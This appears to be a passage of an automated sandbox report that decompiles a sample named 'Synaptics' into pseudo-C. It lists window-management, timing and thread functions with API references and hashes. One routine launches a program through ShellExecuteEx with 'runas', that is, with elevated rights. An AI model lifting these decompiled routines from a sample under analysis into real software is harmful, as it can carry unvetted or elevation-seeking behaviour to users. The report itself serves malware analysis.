                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a81bdb866fff7d6735d4f9ff79d33825cf0af72ddee7089733f24c20b3a4484
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2931B2B1904608AEDB01EBA5DD42AEF77BDEF45304F51453AF904FB280DBB86E048668
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A104 Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                          			E0045A104(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045906C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00407540();
						}
					}
					_t26 =  *0x49d970; // 0x49e900
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x49d970; // 0x49e900
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00454D78(_t36, 0);
						E00457194( *((intOrPtr*)(_t51 + 0x44)));
					}
					E0045974C(_t51);
					_t21 =  *0x49ebbc; // 0x22b1320
					_t15 = _t21 + 0x64; // 0x0
					_t55 =  *_t15;
					if( *_t15 != 0) {
						_t21 = SetFocus(E00441704(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}











                                                                                                                                                                                          0x0045a106
                                                                                                                                                                                          0x0045a10c
                                                                                                                                                                                          0x0045a113
                                                                                                                                                                                          0x0045a11d
                                                                                                                                                                                          0x0045a126
                                                                                                                                                                                          0x0045a160
                                                                                                                                                                                          0x0045a168
                                                                                                                                                                                          0x0045a137
                                                                                                                                                                                          0x0045a145
                                                                                                                                                                                          0x0045a147
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a149
                                                                                                                                                                                          0x0045a149
                                                                                                                                                                                          0x0045a14b
                                                                                                                                                                                          0x0045a150
                                                                                                                                                                                          0x0045a158
                                                                                                                                                                                          0x0045a159
                                                                                                                                                                                          0x0045a159
                                                                                                                                                                                          0x0045a147
                                                                                                                                                                                          0x0045a175
                                                                                                                                                                                          0x0045a17e
                                                                                                                                                                                          0x0045a180
                                                                                                                                                                                          0x0045a182
                                                                                                                                                                                          0x0045a182
                                                                                                                                                                                          0x0045a188
                                                                                                                                                                                          0x0045a191
                                                                                                                                                                                          0x0045a193
                                                                                                                                                                                          0x0045a195
                                                                                                                                                                                          0x0045a195
                                                                                                                                                                                          0x0045a19f
                                                                                                                                                                                          0x0045a1a4
                                                                                                                                                                                          0x0045a1a9
                                                                                                                                                                                          0x0045a1bc
                                                                                                                                                                                          0x0045a1c4
                                                                                                                                                                                          0x0045a1c4
                                                                                                                                                                                          0x0045a1cb
                                                                                                                                                                                          0x0045a1d0
                                                                                                                                                                                          0x0045a1d5
                                                                                                                                                                                          0x0045a1d5
                                                                                                                                                                                          0x0045a1da
                                                                                                                                                                                          0x0045a1e4
                                                                                                                                                                                          0x0045a1e4
                                                                                                                                                                                          0x0045a1f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a1fb
                                                                                                                                                                                          0x0045a1f1
                                                                                                                                                                                          0x0045a203

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsIconic.USER32 ref: 0045A10C
                                                                                                                                                                                          • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                                                                                                                                                          • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                                                                                                                                                          • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3996302123-0
                                                                                                                                                                                          • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                          • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                          • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004410F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E00441A08(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E00441A08(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0043A91C(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0043A5D0(_t52);
						return E00403DE8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                                                                                                                                                          0x004410f9
                                                                                                                                                                                          0x004410fb
                                                                                                                                                                                          0x004410fd
                                                                                                                                                                                          0x00441102
                                                                                                                                                                                          0x0044111d
                                                                                                                                                                                          0x00441126
                                                                                                                                                                                          0x00441154
                                                                                                                                                                                          0x00441154
                                                                                                                                                                                          0x00441157
                                                                                                                                                                                          0x0044115d
                                                                                                                                                                                          0x00441163
                                                                                                                                                                                          0x00441168
                                                                                                                                                                                          0x0044116d
                                                                                                                                                                                          0x0044116f
                                                                                                                                                                                          0x00441171
                                                                                                                                                                                          0x00441183
                                                                                                                                                                                          0x0044118d
                                                                                                                                                                                          0x00441198
                                                                                                                                                                                          0x00441199
                                                                                                                                                                                          0x0044119a
                                                                                                                                                                                          0x0044119b
                                                                                                                                                                                          0x004411a7
                                                                                                                                                                                          0x004411a7
                                                                                                                                                                                          0x004411ac
                                                                                                                                                                                          0x004411ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004411b9
                                                                                                                                                                                          0x0044112f
                                                                                                                                                                                          0x00441134
                                                                                                                                                                                          0x00441136
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044114d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00441111
                                                                                                                                                                                          0x00441111
                                                                                                                                                                                          0x00441117
                                                                                                                                                                                          0x004411c4
                                                                                                                                                                                          0x004411c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00441117

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsIconic.USER32 ref: 0044112F
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                                                                                                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                                                                                                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Placement$Iconic
                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                          • API String ID: 568898626-3772416878
                                                                                                                                                                                          • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                          • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                                                                                                                                                          • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00473490 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67sleepsynchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00473490(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __eflags, char _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char* _t33;
				intOrPtr _t43;
				intOrPtr _t52;
				void* _t56;

				_v12 = __ecx;
				_v8 = __edx;
				_t43 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t56);
				_push(0x473564);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffbc;
				E004032B4( &_v72, 0x3c);
				_v72 = 0x3c;
				_v64 = _t43;
				_v68 = 0x440;
				_v56 = E00404E80(_v8);
				if(_a8 != 0) {
					_v60 = 0x473574;
				}
				if(_v12 != 0) {
					_v52 = E00404E80(_v12);
				}
				_v44 = 1;
				_t33 =  &_v72;
				_push(_t33);
				L0042EC28();
				if(_t33 != 0) {
					if(_a4 != 0 && _v16 != 0) {
						while(WaitForSingleObject(_v16, 0x32) == 0x102) {
							Sleep(0x32);
						}
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E0047356B);
				return E004049E4( &_v12, 2);
			}

















                                                                                                                                                                                          0x00473497
                                                                                                                                                                                          0x0047349a
                                                                                                                                                                                          0x0047349d
                                                                                                                                                                                          0x004734a2
                                                                                                                                                                                          0x004734aa
                                                                                                                                                                                          0x004734b1
                                                                                                                                                                                          0x004734b2
                                                                                                                                                                                          0x004734b7
                                                                                                                                                                                          0x004734ba
                                                                                                                                                                                          0x004734c7
                                                                                                                                                                                          0x004734cc
                                                                                                                                                                                          0x004734d3
                                                                                                                                                                                          0x004734d6
                                                                                                                                                                                          0x004734e5
                                                                                                                                                                                          0x004734ec
                                                                                                                                                                                          0x004734f3
                                                                                                                                                                                          0x004734f3
                                                                                                                                                                                          0x004734fa
                                                                                                                                                                                          0x00473504
                                                                                                                                                                                          0x00473504
                                                                                                                                                                                          0x00473507
                                                                                                                                                                                          0x0047350e
                                                                                                                                                                                          0x00473511
                                                                                                                                                                                          0x00473512
                                                                                                                                                                                          0x00473519
                                                                                                                                                                                          0x0047351f
                                                                                                                                                                                          0x00473530
                                                                                                                                                                                          0x0047352b
                                                                                                                                                                                          0x0047352b
                                                                                                                                                                                          0x00473530
                                                                                                                                                                                          0x00473542
                                                                                                                                                                                          0x0047354b
                                                                                                                                                                                          0x0047354e
                                                                                                                                                                                          0x00473551
                                                                                                                                                                                          0x00473563

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                                                                                                                                                          • Sleep.KERNEL32(00000032,00000000,00000032,00000000,00473564,?,00000000), ref: 0047352B
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564,?,00000000), ref: 00473536
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteObjectShellSingleSleepWait
                                                                                                                                                                                          • String ID: <$runas
                                                                                                                                                                                          • API String ID: 3175876650-1187129395
                                                                                                                                                                                          • Opcode ID: ebaadd7e2728cc986bb086e255469f07590763c46f5c4a9f0885ad3b9e2f30a5
                                                                                                                                                                                          • Instruction ID: 5aa402594196cc22e358d2c9fc2044dae5621586ffdb0388778a4eaf1ff726ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: ebaadd7e2728cc986bb086e255469f07590763c46f5c4a9f0885ad3b9e2f30a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: BC217FB0904208BBDB15DFAAD486BDEBBB8EB04304F50807BF508A6291D77C9B45DB49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A054 Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E0045A054(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E0045973C();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045906C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00407540();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}






                                                                                                                                                                                          0x0045a056
                                                                                                                                                                                          0x0045a058
                                                                                                                                                                                          0x0045a05c
                                                                                                                                                                                          0x0045a063
                                                                                                                                                                                          0x0045a06b
                                                                                                                                                                                          0x0045a070
                                                                                                                                                                                          0x0045a074
                                                                                                                                                                                          0x0045a07d
                                                                                                                                                                                          0x0045a0e1
                                                                                                                                                                                          0x0045a0e4
                                                                                                                                                                                          0x0045a0a0
                                                                                                                                                                                          0x0045a0a4
                                                                                                                                                                                          0x0045a0b6
                                                                                                                                                                                          0x0045a0bc
                                                                                                                                                                                          0x0045a0c0
                                                                                                                                                                                          0x0045a0c5
                                                                                                                                                                                          0x0045a0c7
                                                                                                                                                                                          0x0045a0cc
                                                                                                                                                                                          0x0045a0d1
                                                                                                                                                                                          0x0045a0d1
                                                                                                                                                                                          0x0045a0d4
                                                                                                                                                                                          0x0045a0d5
                                                                                                                                                                                          0x0045a0d5
                                                                                                                                                                                          0x0045a0f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a0fb
                                                                                                                                                                                          0x0045a0f1
                                                                                                                                                                                          0x0045a103

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsIconic.USER32 ref: 0045A05C
                                                                                                                                                                                          • SetActiveWindow.USER32(00000000,00000000,?,?,0045A790), ref: 0045A074
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                                                                                                                                                          • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0045A0D5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1720852555-0
                                                                                                                                                                                          • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                          • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042C6FC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x49e929 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E0042C66C( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x49e904; // 0x42c6fc
				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
				return  *0x49e904(_t23, _t19);
			}










                                                                                                                                                                                          0x0042c704
                                                                                                                                                                                          0x0042c707
                                                                                                                                                                                          0x0042c711
                                                                                                                                                                                          0x0042c73b
                                                                                                                                                                                          0x0042c74c
                                                                                                                                                                                          0x0042c75f
                                                                                                                                                                                          0x0042c74e
                                                                                                                                                                                          0x0042c753
                                                                                                                                                                                          0x0042c753
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042c769
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042c73d
                                                                                                                                                                                          0x0042c718
                                                                                                                                                                                          0x0042c725
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                          • String ID: MonitorFromWindow
                                                                                                                                                                                          • API String ID: 190572456-2842599566
                                                                                                                                                                                          • Opcode ID: 2850c889a9a11c96de1ba7b4d63e14319c300ad4c71145359c67bc565aba3dd9
                                                                                                                                                                                          • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2850c889a9a11c96de1ba7b4d63e14319c300ad4c71145359c67bc565aba3dd9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00435BD4 Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00435BD4(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x435c51);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00435634(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00435234(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E00404E80(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x435c58);
				return E004049C0( &_v8);
			}









                                                                                                                                                                                          0x00435bd7
                                                                                                                                                                                          0x00435bdb
                                                                                                                                                                                          0x00435bdf
                                                                                                                                                                                          0x00435be0
                                                                                                                                                                                          0x00435be5
                                                                                                                                                                                          0x00435be8
                                                                                                                                                                                          0x00435bed
                                                                                                                                                                                          0x00435bf7
                                                                                                                                                                                          0x00435bf9
                                                                                                                                                                                          0x00435bfb
                                                                                                                                                                                          0x00435c07
                                                                                                                                                                                          0x00435c15
                                                                                                                                                                                          0x00435c1e
                                                                                                                                                                                          0x00435c27
                                                                                                                                                                                          0x00435c36
                                                                                                                                                                                          0x00435c36
                                                                                                                                                                                          0x00435c3d
                                                                                                                                                                                          0x00435c40
                                                                                                                                                                                          0x00435c43
                                                                                                                                                                                          0x00435c50

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00435634: WinHelpA.USER32 ref: 00435643
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00435BF2
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000000,00435C51,?,?,00000000,00000000,?,00435BCA), ref: 00435BFB
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00435C00
                                                                                                                                                                                          • WinHelpA.USER32 ref: 00435C36
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountHelpTick$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2438605093-0
                                                                                                                                                                                          • Opcode ID: a2f7b5e0f16c6537a843b201b60e566bfc976df2c88c7e05e30b0dfa0f7e307d
                                                                                                                                                                                          • Instruction ID: 40ece7025a35593bf5630c28b5397b8871db868c6d8e528fc1fd908e9dcdadfb
                                                                                                                                                                                          • Opcode Fuzzy Hash: a2f7b5e0f16c6537a843b201b60e566bfc976df2c88c7e05e30b0dfa0f7e307d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8701A270A04604AFE711EBAACC53B1EB3A8DB4C708F6155BBF500A62C1DA7CAD01855A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00458EA4 Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00458EA4() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x49ebc8 = GetCurrentThreadId();
				L5:
				_t5 =  *0x49ebcc; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x49ebb8 != 0 &&  *((intOrPtr*)( *0x49ebb8 + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E004397F4( &_v12) == 0) {
							E0045B3A8( *0x49ebb8);
						}
					}
					goto L5;
				}
				return _t6;
			}






                                                                                                                                                                                          0x00458eb5
                                                                                                                                                                                          0x00458ee5
                                                                                                                                                                                          0x00458ee7
                                                                                                                                                                                          0x00458eed
                                                                                                                                                                                          0x00458ef7
                                                                                                                                                                                          0x00458ebf
                                                                                                                                                                                          0x00458ecd
                                                                                                                                                                                          0x00458edc
                                                                                                                                                                                          0x00458ee0
